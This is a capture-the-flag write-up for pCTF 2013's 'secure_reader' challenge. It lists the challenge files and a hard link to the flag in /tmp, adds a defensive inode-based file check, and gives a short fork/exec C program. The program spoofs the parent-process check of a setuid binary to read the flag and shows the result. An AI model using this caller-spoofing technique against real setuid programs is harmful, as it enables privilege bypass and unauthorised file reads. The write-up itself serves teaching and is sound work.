04 May 2013

pCTF 2013 – secure_reader (pwn 150)

I can’t figure out how to read the flag 🙁 ssh to 54.224.109.162

The secure_reader program can read the flag, but can only be invoked from the reader program.

team9@securereader:~$ ls -la /home/securereader/
total 1476
drwxr-xr-x    2 root         root   4096 Apr 19 18:56 .
drwxr-xr-x 1004 root         root  24576 Apr 19 18:53 ..
-r--------    1 securereader root     29 Apr 19 18:56 flag
-r-xr-xr-x    1 root         root 739695 Apr 19 12:49 reader
-r-sr-xr-x    1 securereader root 734666 Apr 19 12:49 secure_reader

Additionally, the secure_reader will not read the flag from /home/securereader/flag. Somebody already made a hard link in /tmp:

team9@securereader:~$ ls -alh /tmp/flag
-r-------- 6 securereader root 29 Apr 19 18:56 /tmp/flag
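
An added example, not code from the challenge or from this write-up: assuming the refusal above is a comparison on the path string (the write-up does not confirm how secure_reader decides), the check below identifies the file by device and inode on the opened descriptor instead, so a hard link such as /tmp/flag is recognised as the same file. The names is_protected_file and demo_check and the temp-directory files are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if `path` opens the same inode as `protected_path`, 0 if not, -1 on
 * error (callers should treat -1 as "deny"). The identity is taken from the
 * opened descriptor, so hard links and symlinks cannot hide it. */
int is_protected_file(const char *path, const char *protected_path)
{
    struct stat want, got;
    int fd, same;

    if (stat(protected_path, &want) != 0) return -1;
    if ((fd = open(path, O_RDONLY)) < 0) return -1;
    if (fstat(fd, &got) != 0) { close(fd); return -1; }
    same = got.st_dev == want.st_dev && got.st_ino == want.st_ino;
    close(fd);   /* a real reader would keep using this fd, not reopen path */
    return same;
}

/* Constructed demo: a temp directory holding "flag", a hard link "alias" to
 * it and an unrelated file "other". Returns the check result for `name`. */
int demo_check(const char *name)
{
    char dir[] = "/tmp/inode_demo_XXXXXX";
    char flag[64], alias[64], other[64], target[64];
    int fd, result;

    if (!mkdtemp(dir)) return -1;
    snprintf(flag, sizeof flag, "%s/flag", dir);
    snprintf(alias, sizeof alias, "%s/alias", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    snprintf(target, sizeof target, "%s/%s", dir, name);
    if ((fd = open(flag, O_CREAT | O_WRONLY, 0400)) >= 0) close(fd);
    if ((fd = open(other, O_CREAT | O_WRONLY, 0400)) >= 0) close(fd);
    result = link(flag, alias) == 0 ? is_protected_file(target, flag) : -1;
    unlink(alias); unlink(other); unlink(flag); rmdir(dir);
    return result;
}

int main(void)
{
    printf("alias -> %d, other -> %d\n", demo_check("alias"), demo_check("other"));
    return 0;
}
```

On Linux, the fs.protected_hardlinks sysctl additionally stops users from creating hard links to files they do not own and cannot read and write.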

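Now, to fake the invocation, we fork: the parent executes reader on a big file, which takes a while to process, and the child sleeps for a second and then executes secure_reader. Because exec keeps the process ID, the child's parent is already running reader by the time secure_reader starts: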

test.c:

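#include <unistd.h>

int main(void) {
        pid_t child = fork();
        if (child == 0) {
                /* Child: wait until the parent has exec'd reader, then run secure_reader. */
                sleep(1);
                execl("/home/securereader/secure_reader", "secure_reader", "/tmp/flag", (char *)NULL);
        } else {
                /* Parent: becomes reader and stays busy on a large file. */
                execl("/home/securereader/reader", "reader.elf", "/tmp/blablabla/bigfile", (char *)NULL);
        }
        return 1; /* reached only if execl() failed */
}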

Result:

team9@securereader:~$ ./test
that_was_totally_a_good_idea
^C
team9@securereader:~$ ^C
